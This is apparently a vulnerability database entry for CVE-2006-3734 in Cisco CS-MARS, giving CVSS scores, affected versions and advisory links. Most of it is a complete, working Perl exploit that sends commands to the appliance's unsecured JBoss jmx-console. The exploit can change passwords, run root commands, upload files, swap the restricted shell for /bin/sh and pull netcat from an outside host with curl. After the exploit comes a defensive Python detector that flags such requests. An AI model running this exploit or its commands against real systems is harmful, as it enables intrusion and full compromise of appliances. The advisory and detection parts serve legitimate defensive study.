CVE-2006-3734
CVSS 7.2
Published: 2006-07-21 10:03:00
Revised: 2011-03-07 21:39:21
NMCOE

[Original] Multiple unspecified vulnerabilities in the Command Line Interface (CLI) for Cisco Security Monitoring, Analysis and Response System (CS-MARS) before 4.2.1, allow local CS-MARS administrators to execute arbitrary commands as root.


[CNNVD] Cisco CS-MARS Multiple Privilege Escalation Vulnerabilities (CNNVD-200607-291)

Cisco Security Monitoring, Analysis and Response System (CS-MARS) receives event logs from a wide range of network devices, correlates and analyzes the received security data, and reports its findings.
The CS-MARS CLI is a restricted shell environment that allows authenticated administrators to perform system maintenance tasks. The CLI implementation contains several privilege escalation vulnerabilities that could allow shell commands to be executed as the root user on the underlying appliance operating system.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [can result in complete system shutdown]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/h:cisco:cs-mars:4.1.3    Cisco CS-MARS 4.1.3
cpe:/h:cisco:cs-mars:4.1.2    Cisco CS-MARS 4.1.2
cpe:/h:cisco:cs-mars:4.1.5    Cisco CS-MARS 4.1.5
cpe:/h:cisco:cs-mars:4.1      Cisco CS-MARS 4.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3734
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3734
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-291
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/19071
(PATCH)  BID  19071
http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml
(PATCH)  CISCO  20060719 Multiple Vulnerabilities in Cisco Security Monitoring, Analysis and Response System (CS-MARS)
http://securitytracker.com/id?1016537
(PATCH)  SECTRACK  1016537
http://secunia.com/advisories/21118
(VENDOR_ADVISORY)  SECUNIA  21118
http://xforce.iss.net/xforce/xfdb/27812
(UNKNOWN)  XF  cisco-cli-command-execution(27812)
http://www.vupen.com/english/advisories/2006/2887
(UNKNOWN)  VUPEN  ADV-2006-2887
http://www.securityfocus.com/bid/19077
(UNKNOWN)  BID  19077

- Vulnerability information

Cisco CS-MARS Multiple Privilege Escalation Vulnerabilities
High  Design error
2006-07-21 00:00:00  2006-08-09 00:00:00
Local

- Advisories and patches

The vendor has released an upgrade to fix this security issue; download links:
        http://www.cisco.com/warp/public/707/cisco-sa-20060719-mars.shtml
        http://www.cisco.com/pcgi-bin/tablebuild.pl/cs-mars?psrtdcat20e2

- Vulnerability information (2048)

Cisco/Protego CS-MARS < 4.2.1 (JBoss) Remote Code Execution Exploit (EDBID:2048)
Platform: hardware  Type: remote
2006-07-20 Verified
0 Jon Hart
N/A
#!/usr/bin/perl
# 
# Cisco/Protego CS-MARS < 4.2.1 remote command execution, system compromise
# via insecure JBoss installation.
#
# Fully functional POC code by Jon Hart <jhart@spoofed.org>
#
# Addressed in CSCse47646
#
# CS-MARS is an event correlation product originally written by Protego,
# which is now owned by Cisco.  It is built on top of JBoss.
# Unfortunately, little or no effort was put in to securing the JBoss
# installation as per the JBoss community's recommended best practices.
# As such, the usual set of JBoss interfaces are wide open and it is up to
# the attacker how creative they want to be in compromising the box.  This
# particular exploit vector abuses the JBoss jmx-console for all sorts of
# fun.  It should also be noted that, because of the very old kernel
# running on most CS-MARS boxes (2.4.9), once JBoss is compromised, root is
# almost trivial.  Thanks to Cisco PSIRT and Matt Cerha for their
# cooperation in getting this fixed.
#
#################################
#  Copyright (C) 2006 Jon Hart
#
#  This program is free software; you can redistribute it and/or modify it
#  under the terms of the GNU General Public License as published by the Free
#  Software Foundation; either version 2 of the License, or (at your option)
#  any later version.
#
#  This program is distributed in the hope that it will be useful, but WITHOUT
#  ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
#  FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
#  more details.
#
#  You should have received a copy of the GNU General Public License along with
#  this program; if not, write to the Free Software Foundation, Inc., 59 Temple
#  Place, Suite 330, Boston, MA 02111-1307 USA
#
#
#################################
#

use strict;
use HTTP::Request::Common;
use LWP::UserAgent;
use IO::Socket;

my $target = shift(@ARGV) || &usage;
my $attack_type = shift(@ARGV) || &usage; 

for ($attack_type) {
   if    (/pass/) { &change_passwd(@ARGV); }
   elsif (/cmd/) { &run_cmd(@ARGV); }
   elsif (/upload/) { &upload(@ARGV); }
   elsif (/bean|bsh/) { &run_bsh(@ARGV); }   # alternation, not a character class
   else { &usage; }
} 

sub change_passwd {
   my $passwd = shift;
   &run_cmd("/opt/janus/release/bin/pnpasswd $passwd");
}

sub encode {
   my $en = shift;
   my $string = "";
   foreach my $char (split(//, $en)) {
      if ($char =~ /([:|\/|(|)|"|'|`| ])/) {
         $string .= sprintf("%%%x", ord($1));
      } else { $string .= $char; }
   }
   return $string;
}

sub jmx_post {
   my $form_data = shift; 
   my $ua = LWP::UserAgent->new;
   $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
   my $req = HTTP::Request->new(POST => "http://$target/jmx-console/HtmlAdaptor");
   $req->content_type('application/x-www-form-urlencoded');
   $req->content(&encode($form_data));

   my $res = $ua->request($req);

   return $res->is_success ? 0 : $res->status_line;
}

sub run_bsh {
   my $file = shift;
   my $bsh = "";
   open(BSH, "$file") or die "Couldn't open $file: $!\n";
   print("Sending beanshell from $file: ");
   while (<BSH>) {
      # the bsh must be one long string...
      chomp();
      $bsh .= $_;
   }
   
   printf("%s\n", &send_beanshell($bsh) == 0 ? "Success" : "Failed");
}

sub run_cmd {
   my $cmd = shift; 
   my $code = "";
  
   # & in the command needs to be encoded so as to not be confused with the &
   # in the URI
   $cmd =~ s/&/%26/g;
   if ($cmd =~ />|\||&/) {
      # exec() does not handle pipes or redirection well, so do this instead
      $code = 'String sh = "/bin/sh"; String opt = "-c"; String cmd = "'
            . $cmd .
            '"; String[] exec = new String[] { sh, opt, cmd }; Runtime.getRuntime().exec(exec);';
   } else {
      $code = "Runtime.getRuntime().exec(\"$cmd\");";
   }

   print("Running '$cmd' on $target: ");
   printf("%s\n", &send_beanshell($code) == 0 ? "Success" : "Failed!");
}

sub send_beanshell {
   my $code = shift;
   # ensure the name of the bsh job within java has a unique name
   my $name = "cmd" . int(rand(65535)) . $$;
   return &jmx_post("action=invokeOp&name=jboss.scripts:service=BSHDeployer&methodIndex=1&arg0=$code&arg1=$name");
}

sub upload {
   # upload a file.  I was too lazy to use org.jboss.console.manager.DeploymentFileRepository
   my $file = shift;
   my $path = shift;
   my $new_name = shift;
   my $chunk = "";
   my $ret = 0;
   open(FILE, "< $file") or die "Couldn't open $file for reading: $!\n";

   if (!(defined($new_name))) {
      my @path = split(/\//, $file);
      $new_name = $path[$#path];
   }

   print("Uploading $file to $target...\n");
   &run_cmd("touch $path/$new_name");
   while(read(FILE,$chunk,4096)) {
      # encode this file in 4096 byte chunks in a format that is able to be handled by JBoss.
      # There are plenty of ways to do this, but none that were both portable and that didn't make JBoss 
      # throw a 500 or otherwise botch the file.  UGLY.
      $chunk = join('', map { sprintf("%03d,", ord("$_")) } split(//, $chunk));
      $ret += &run_cmd("echo -n $chunk | perl -ne 'foreach (split(/,/, \$_)) { print chr(\$_); }' >> $path/$new_name");
   }

   printf("Upload of $file to $target:$path/$new_name %s!\n", $ret == 0 ? "succeeded" : "failed");
}


sub usage {
   print <<EOF;
   Cisco MARS (CS-MARS) < 4.2.1 JBoss exploit (CSCse47646) POC by Jon Hart <jhart\@spoofed.org>

   Basic Usage:
      $0 <target> <exploit_type> [<exploit_specific_args] ...]

   Extended Usage:
      Change password:
      $0 <target> pass <password>
      Run shell command:
      $0 <target> cmd <your quoted shell command>
      Run BeanShell code:
      $0 <target> bsh /path/to/file/with/beanshell
      Upload files:
      $0 <target> upload <file to upload> <path on target> [<new name>]

      Fun Stuff:
         Get a real shell:
         $0 <target> cmd "cp /opt/janus/release/bin/pnsh /opt/janus/release/bin/pnsh.bak"
         $0 <target> cmd "rm  /opt/janus/release/bin/pnsh"
         $0 <target> cmd "cp /bin/sh /opt/janus/release/bin/pnsh"
         # now ssh to the target...
         [pnadmin\@pnmars bin]\$ id
         uid=501(pnadmin) gid=501(pnadmin) groups=501(pnadmin)
         [pnadmin\@pnmars bin]\$ uname -a
         Linux pnmars 2.4.9-e.57 #1 Thu Dec 2 20:56:19 EST 2004 i686 unknown
         [pnadmin\@pnmars bin]\$ hostname
         pnmars
         
         Download something:
         $0 <target> cmd "curl http://yourhost/nc -o /tmp/nc"

EOF
exit(1);
}

# milw0rm.com [2006-07-20]
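As an added defensive example (not part of the exploit above, nor Cisco's or this site's material): a Python check that classifies requests to the JBoss jmx-console HtmlAdaptor the way a reverse-proxy or IDS filter in front of the appliance would, decoding the form body and flagging invokeOp calls on deployer MBeans whose arguments carry OS command execution. The sample request bodies are constructed to match the shape of what the script sends.

```python
from urllib.parse import parse_qs

# Constructed sample body of a POST to /jmx-console/HtmlAdaptor, shaped like the
# request the script above builds (URL-encoded BeanShell in arg0); not captured traffic.
EXPLOIT_BODY = (
    "action=invokeOp&name=jboss.scripts:service=BSHDeployer&methodIndex=1"
    "&arg0=Runtime.getRuntime%28%29.exec%28%22id%22%29%3B&arg1=cmd4242"
)
# Constructed benign console use: reading an MBean's attributes, no operation invoked.
BENIGN_BODY = "action=inspectMBean&name=jboss.system:type=Server"

# MBeans whose operations accept code or files and deploy them (both named in the script above).
DEPLOYER_MBEANS = ("BSHDeployer", "DeploymentFileRepository")
# Substrings in an argument that indicate OS command execution from BeanShell/Java.
EXEC_MARKERS = ("Runtime.getRuntime().exec", "ProcessBuilder", "/bin/sh")


def inspect_jmx_request(path, body):
    """Classify one HTTP request to the JBoss JMX console; None if it is not console traffic."""
    if not path.startswith("/jmx-console/"):
        return None
    # parse_qs splits each pair on the first '=', so 'name=jboss.scripts:service=BSHDeployer'
    # keeps its value intact, and it URL-decodes values, undoing the script's percent-encoding.
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    finding = {"path": path, "action": params.get("action"), "mbean": params.get("name", ""),
               "severity": "info", "reasons": []}
    if finding["action"] != "invokeOp":
        return finding  # attribute reads: worth logging for audit, but nothing is executed
    finding["severity"] = "medium"
    finding["reasons"].append("MBean operation invoked through the HtmlAdaptor")
    if any(m in finding["mbean"] for m in DEPLOYER_MBEANS):
        finding["severity"] = "high"
        finding["reasons"].append("operation on a deployer MBean (can load code or write files)")
    args = [v for k, v in params.items() if k.startswith("arg")]
    hits = [m for m in EXEC_MARKERS if any(m in a for a in args)]
    if hits:
        finding["severity"] = "critical"
        finding["reasons"].append("argument contains OS command execution: " + ", ".join(hits))
    return finding


if __name__ == "__main__":
    for body in (EXPLOIT_BODY, BENIGN_BODY):
        f = inspect_jmx_request("/jmx-console/HtmlAdaptor", body)
        print(f["severity"], f["reasons"])
```

Any hit at "medium" or above from a source other than the administrator network is already a strong signal, since the console has no legitimate external callers on this appliance.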

- Vulnerability information

33069
Cisco CS-MARS Arbitrary Command Execution Local Privilege Escalation
Local Access Required
Loss of Integrity Upgrade
Vendor Verified

- Vulnerability description

- Timeline

2006-07-19 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete